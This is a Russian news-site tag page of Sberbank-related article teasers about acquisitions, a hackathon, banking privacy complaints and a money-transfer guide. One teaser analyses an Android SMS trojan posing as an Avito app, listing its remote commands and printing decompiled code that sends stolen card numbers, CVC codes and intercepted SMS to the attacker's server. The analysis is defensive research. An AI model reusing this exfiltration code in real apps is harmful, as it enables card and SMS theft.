Рубрика «Сбербанк» - 38

Сбербанк России приобрел контрольные пакеты в RuTarget — компании-разработчике рекламной платформы Segmento — и в разработчике системы лояльности и мобильных платежей — компании Platius, пишут «Ведомости» со ссылкой на первого зампреда правления Сбербанка Льва Хасиса.

В обеих компаниях банку принадлежит более 50%. В компании «Читать полностью »

Американская инвестиционная компания JPMorgan скупила 4.5% акций Luxoft, в то время как французский фонд BNP Paribas, наоборот, сократил свою долю в два раза. Как это связано с финансовой ситуацией Luxoft?Читать полностью »

Венчурный фонд Сбербанка вместе с другими инвесторами вложил в канадскую компанию Mobeewave 6,5 миллионов долларов, сообщает РБК. Технология Mobeewave превращает смартфон с NFC в платежный терминал.

Фонд Сбербанка и другие инвесторы вложили 6,5 миллионов долларов в финансовый стартап Mobeewave - 1
Читать полностью »

UPD 02.10.2014. Этот пост почти два года находился в песочнице. Но нашелся кто-то добрый, кто подарил мне за него инвайт. Значит пригодилось.

Теперь я могу его опубликовать, но предупреждаю, что многое уже поменялось. Многие сервисы уже работают с картами Maestro, больше не требуют только Visa или MasterCard. Банковский перевод с Яндекс-денег стал сложнее, теперь требуется пройти идентификацию.

====

У меня оказалось две тысячи рублей на Яндекс-деньгах. Захотелось их вывести. Цена вопроса соизмерима со стоимостью владения VISA или Mastercard. Платную карту заводить не хотелось.

Ниже я расскажу, как

  • получить бесплатную карту Сбербанк-Maestro «Momentum»,
  • подключить сбербанк-онлайн,
  • перевести Яндекс-деньги на карту.

Читать полностью »

Разместил я, ничего не подозревая, объявление на avito.ru. Сколько раз туда ходил! Но на этот раз как-то не удалось…
Я давно был уверен, что многие нехорошие люди парсят телефонные номера с этого сайта, так что такси, строительные материалы, скорая компьютерная помощь, «8-800-555-3-555 — проще позвонить, чем у кого-то занимать» и приглашения на битву экстрасенсов для меня уже привычное дело, но на этот раз было нечто новое.

Приходит мне СМС-сообщение с текстом: «Зaинтерсoвaлo вaше oбьявление кaк нaсчет oбменa нa http://…». Прямо вот так, с пропущенным знаком препинания и ошибками. А по ссылке качается avito.apk. Интересно.

Исследование APK

Ну, подумал я, надо бы глянуть, что этот APK делает. Результат привычной для меня связки из apktool + dex2jar + jd-gui меня не удовлетворил, т.к. не было видно часть классов деревом, хотя доступ по ссылкам к ним получить было можно. Решил я воспользоваться новомодными онлайн-sandbox'ами — и декомпилированный код получил, и информацию, и pcap-файл со сдампленным трафиком. Как оказалось, этот файл загружали до меня, поэтому в мои руки попал более ранний анализ, что было достаточно полезно.

Итак, что умеет этот троян:

  • delivery&&& — рассылка СМС-сообщений на номера из телефонной книги с заданным текстом
  • sent&&& — отправка заданных СМС-сообщений с сервера
  • rent&&& — перехват всех СМС-сообщений и отправка их на сервер
  • sms_stop&&& — отмена перехвата СМС-сообщений
  • ussd&&& — USSD-запрос
  • call_1&&& — установка и отмена безусловной переадресации

Немного кода из моих заметок

protected HttpRequestBase a()
    {
        try
        {
            HttpPost httppost = new HttpPost(d());
            ArrayList arraylist = new ArrayList();
            arraylist.add(new BasicNameValuePair("bot_id", com.avito.a.c.a(c())));
            arraylist.add(new BasicNameValuePair("number", b));
            arraylist.add(new BasicNameValuePair("month", Integer.toString(c.intValue())));
            arraylist.add(new BasicNameValuePair("year", Integer.toString(d.intValue())));
            arraylist.add(new BasicNameValuePair("cvc", Integer.toString(e.intValue())));
            httppost.setEntity(new UrlEncodedFormEntity(arraylist, "UTF-8"));
            return httppost;
        }
        catch(UnsupportedEncodingException unsupportedencodingexception)
        {
            unsupportedencodingexception.printStackTrace();
        }
        return null;
    }

    protected String d()
    {
        return new String((new StringBuilder()).append(a).append("set_card.php").toString());
    }






    protected HttpRequestBase a()
    {
        try
        {
            HttpPost httppost = new HttpPost(d());
            ArrayList arraylist = new ArrayList();
            arraylist.add(new BasicNameValuePair("id", com.avito.a.c.a(b)));
            arraylist.add(new BasicNameValuePair("info", com.avito.a.c.b(b)));
            httppost.setEntity(new UrlEncodedFormEntity(arraylist, "UTF-8"));
            return httppost;
        }
        catch(UnsupportedEncodingException unsupportedencodingexception)
        {
            unsupportedencodingexception.printStackTrace();
        }
        return null;
    }

    protected String d()
    {
        return new String((new StringBuilder()).append(a).append("get.php").toString());
    }




    protected HttpRequestBase a()
    {
        try
        {
            JSONObject jsonobject = new JSONObject();
            jsonobject.put("text", c);
            jsonobject.put("number", d);
            jsonobject.put("date", e);
            HttpPost httppost = new HttpPost(d());
            ArrayList arraylist = new ArrayList();
            arraylist.add(new BasicNameValuePair("bot_id", com.avito.a.c.a(b)));
            arraylist.add(new BasicNameValuePair("sms", jsonobject.toString()));
            httppost.setEntity(new UrlEncodedFormEntity(arraylist, "UTF-8"));
            return httppost;
        }
        catch(UnsupportedEncodingException unsupportedencodingexception)
        {
            unsupportedencodingexception.printStackTrace();
        }
        catch(JSONException jsonexception)
        {
            jsonexception.printStackTrace();
        }
        return null;
    }

    protected String d()
    {
        return new String((new StringBuilder()).append(a).append("load_sms.php").toString());

Помимо этих команд, троян отключает Wifi Sleep, пытается получить доступ к зашифрованному хранилищу и установить себя в качестве Android-администратора (естественно, при этом используются стандартные диалоги ОС, где можно отменить данное действие). Код трояна не обфусцирован, некоторые строки закодированы base64. Вообще непонятно, что это за троян такой. То ли его собирали копипастой, то ли он основан на каком-то другом трояне, то ли еще что, но в нем имеются строки на португальском, немецком, английском, Ubuntu-шрифты, форма для перехвата данных из приложения немецкого банка Commerzbank, значок какой-то игры и флеш-плеера.Читать полностью »

Подходил к концу очередной длинный рабочий день, среда 13 августа 2014 года выдалась действительно непростая, но в 8 часов вечера я находился уже в полу расслабленном состоянии – оставалось завершить кое-какие мелкие дела и можно идти домой. Гармонию вечера нарушило странное сообщение с сервисного номера оператора Мегафон:

«Внимание, по вашему номеру в Салоне МегаФон запрошена информация. Если Вы не обращались в Салон МегаФон, просьба сообщить об этом, отправив смс с текстом САЛОН на номер 0500 (бесплатно).13/08/2014, 20:05:11».

Читать полностью »

image

26-27 июля в DI Telegraph пройдет Хакатон мобильных финансовых сервисов – первый хакатон Сбербанка. Общий призовой фонд победителей в трех номинациях составит 1 000 000 рублей.
Представляем вашему вниманию интервью об ожиданиях прототипа мобильного финансового сервиса с одним из организаторов Хакатона — Владимиром Стасевичем, руководителем продуктов Сбербанк Онлайн, Банк XXI, Сбербанк.

Читать полностью »

На днях состоялось собрание акционеров Сбербанка. в общем-то рядовое финансовое событие, мало касающееся аудитории Хабра, если бы не два но:
— председатель правления Греф вел доклад в Google Glass: «Я не могу весь текст запомнить, поскольку у меня очень большой доклад, там у меня были тезисы. Так я мог смотреть и текст, и аудиторию»
— во время доклада председатель правления говорил о том, что в «в ближайшие годы главными конкурентами банков станут не другие банки, а крупные интернет-ресурсы».

На собрании Сбербанка Греф выступал в Google Glass и говорил о конкуренции с Google и AmazonЧитать полностью »

Я дал знакомому номер моей карты, чтобы он мог перевести мне деньги.
Знакомый сделал перевод и получил квитанцию.
В его квитанции оказались указаны мои паспортные данные (см. скан квитанции под катом).

Я сообщил о проблеме на странице www.facebook.com/sberbank, получил рекомендацию написать на адрес zabota@sberbank.ru

17 сентября я отправил на этот адрес описание истории и вопрос:

«Сообщите пожалуйста, почему и как в квитанции оказались мои паспортные данные и, таким образом, произошла передача моих персональных данных третьему лицу?»

Прошло почти 2 недели, никакого ответа я так и не получил, поэтому начинаю размещение открытых сообщений.

Я считаю, что важно, чтобы максимальное количество клиентов Сбера узнало о том, как банк относится к их личным данным.
Читать полностью »

Доброго времени суток, уважаемое читатели.

Существует мнение, что частная информация вкладчика банка – это неприкосновенная ценность. То есть, нечто, чего не может коснуться никто: ни сосед, ни друг, ни враг, ни государство. Отсюда вопрос: какого хрена.
Читать полностью »


https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js